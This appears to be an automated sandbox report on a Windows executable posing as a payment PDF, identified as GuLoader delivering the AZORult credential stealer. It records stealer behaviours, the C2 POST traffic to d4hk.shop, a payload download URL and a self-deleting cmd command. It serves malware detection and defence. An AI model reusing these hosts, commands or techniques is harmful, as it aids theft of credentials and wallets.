Windows Analysis Report
Payment Advice Note_Pdf.exe

Overview

General Information

Sample name: Payment Advice Note_Pdf.exe
Analysis ID: 1522667
MD5: 6252d288d82fa00e65d3ba32bdc53411
SHA1: c9c0c3e7d495ad742c76260964810ed5f0b82cd1
SHA256: 9f2aca94590b9f367108ce3db9f0c67d35e884f1f254fb7f761e00f2c905bdcf
Infos:

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Azorult
Yara detected GuLoader
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Azorult AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
 https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: http://d4hk.shop/MI341/index.php Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for submitted file
Source: Payment Advice Note_Pdf.exe Virustotal: Detection: 13% Perma Link
Uses 32bit PE files
Source: Payment Advice Note_Pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.93.121.126:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: Payment Advice Note_Pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1427385273.00000000358A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00406362 FindFirstFileW,FindClose, 0_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00406362 FindFirstFileW,FindClose, 2_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_004027FB FindFirstFileW, 2_2_004027FB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2029468 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M15 : 192.168.11.20:49754 -> 172.67.215.93:80
Source: Network traffic Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.11.20:49754 -> 172.67.215.93:80
Source: Network traffic Suricata IDS: 2029138 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M3 : 172.67.215.93:80 -> 192.168.11.20:49754
Source: Network traffic Suricata IDS: 2029468 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M15 : 192.168.11.20:49755 -> 172.67.215.93:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49753 -> 172.93.121.126:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Hpgcc91.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: uktnl.vantechdns.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /MI341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: d4hk.shopContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 3b 70 9d 3b 70 9d 37 13 8b 30 64 ed 42 10 8b 31 11 8b 30 65 8b 30 63 ec 26 66 9b 45 70 9d 35 70 9d 35 11 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp;p;p70dB10e0c&fEp5p5
Source: global traffic HTTP traffic detected: POST /MI341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: d4hk.shopContent-Length: 43514Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: global traffic HTTP traffic detected: GET /Hpgcc91.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: uktnl.vantechdns.comCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: uktnl.vantechdns.com
Source: global traffic DNS traffic detected: DNS query: d4hk.shop
Source: unknown HTTP traffic detected: POST /MI341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: d4hk.shopContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 3b 70 9d 3b 70 9d 37 13 8b 30 64 ed 42 10 8b 31 11 8b 30 65 8b 30 63 ec 26 66 9b 45 70 9d 35 70 9d 35 11 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp;p;p70dB10e0c&fEp5p5
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://d4hk.shop/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://d4hk.shop/MI341/index.php
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://d4hk.shop/MI341/index.phpA
Source: Payment Advice Note_Pdf.exe, 00000000.00000000.884748585.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Payment Advice Note_Pdf.exe, 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1429245765.0000000036590000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005429000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354338715.0000000000068000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354292731.0000000000064000.00000004.00001000.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.0000000005426000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.0000000005426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.000000000541B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.000000000541B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.0000000005426000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uktnl.vantechdns.com/
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1417784434.0000000007030000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://uktnl.vantechdns.com/Hpgcc91.bin
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uktnl.vantechdns.com/d4
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown HTTPS traffic detected: 172.93.121.126:443 -> 192.168.11.20:49753 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_004052BD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052BD

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Payment Advice Note_Pdf.exe
Source: initial sample Static PE information: Filename: Payment Advice Note_Pdf.exe
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040326A
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040326A
Creates driver files
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\toenailed\quoteworthy\Atoning\Skiftevis.sys Jump to behavior
Creates files inside the system directory
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Windows\resources\0409 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_004066E3 0_2_004066E3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00404AFA 0_2_00404AFA
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_004066E3 2_2_004066E3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00404AFA 2_2_00404AFA
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: String function: 00402BBF appears 51 times
PE / OLE file has an invalid certificate
Source: Payment Advice Note_Pdf.exe Static PE information: invalid certificate
PE file does not import any functions
Source: api-ms-win-crt-multibyte-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.2.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1427385273.00000000358A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Payment Advice Note_Pdf.exe
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Payment Advice Note_Pdf.exe
Uses 32bit PE files
Source: Payment Advice Note_Pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/56@3/2
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040326A
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040326A
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_0040457E GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_0040457E
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00402095 CoCreateInstance, 0_2_00402095
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\toenailed Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-884F1CAE-06B5F66D
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_03
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsvE6B1.tmp Jump to behavior
Source: Payment Advice Note_Pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1353127205.000000000542E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Payment Advice Note_Pdf.exe Virustotal: Detection: 13%
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File read: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
